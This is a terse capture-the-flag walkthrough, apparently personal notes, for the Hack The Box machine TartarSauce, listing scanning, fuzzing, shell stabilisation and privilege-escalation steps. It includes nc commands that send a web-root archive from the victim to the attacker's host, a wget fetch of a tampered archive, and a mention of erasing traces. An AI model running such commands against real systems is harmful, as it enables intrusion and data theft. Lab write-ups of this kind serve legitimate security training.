Cu3rv0x

nmap -p- --open -T5 -v -n 10.129.1.185

nmap -p- -sS --min-rate 5000 --open -vvv -n -Pn 10.129.1.185 -oG allPorts

Pasted image 20210813142034.png

extractPorts allPorts

nmap -sCV -p80 10.129.1.185 -oN targeted

whatweb http://10.129.1.185

Pasted image 20210813142437.png

Pasted image 20210813142700.png

Pasted image 20210813142721.png

wfuzz -c -t 400 --hc=404 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt http://10.129.1.185/webservices/FUZZ

Pasted image 20210813143401.png

echo "10.129.1.185 tartarsauce.htb" | sudo tee -a /etc/hosts

Pasted image 20210813145032.png

wfuzz -c -t 200 --hc=404 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt http://10.129.1.185/webservices/FUZZ

Pasted image 20210813145237.png

vim wp-load.php

Pasted image 20210813145955.png

Pasted image 20210813152946.png

script /dev/null -c bash Despues hacer un ctrl Z stty raw -echo; fg reset El terminal type es: xterm export TERM=xterm export SHELL=bash stty rows 51 columns 189

Pasted image 20210813155121.png

Pasted image 20210814075103.png

#para borrar huellas

Pasted image 20210814092123.png

Pasted image 20210814093510.png

watch ls -la /var/tmp

Pasted image 20210814093922.png

systemctl list-timers

Pasted image 20210814094637.png

tar -zcvf backup.tar /var/www/html

Hacemos un tar del directorio.

pasar archivo de linux a linux

Pasted image 20210814094842.png

Desde la maquina atacada mandamos el archivo a kali

nc 10.10.14.108 443 < backup.tar

Y en kali recibimos el archivo comprimido

nc -lvnp 443 > backup.tar

Pasted image 20210814095108.png

tar -xf backup.tar

Pasted image 20210814095301.png

Hacemos el siguiente script y lo corremos

Pasted image 20210814105919.png

Pasted image 20210814100958.png

Comprimimos el directorio de nuevo

tar -zcvf backup.tar /var/www/html

Pasted image 20210814101137.png

python3 -m http.server 80

wget http://10.10.14.108/backup.tar

Pasted image 20210814105515.png

chmod +x ne_exploit.sh

Le damos permisos de ejecucion.

Pasted image 20210814105826.png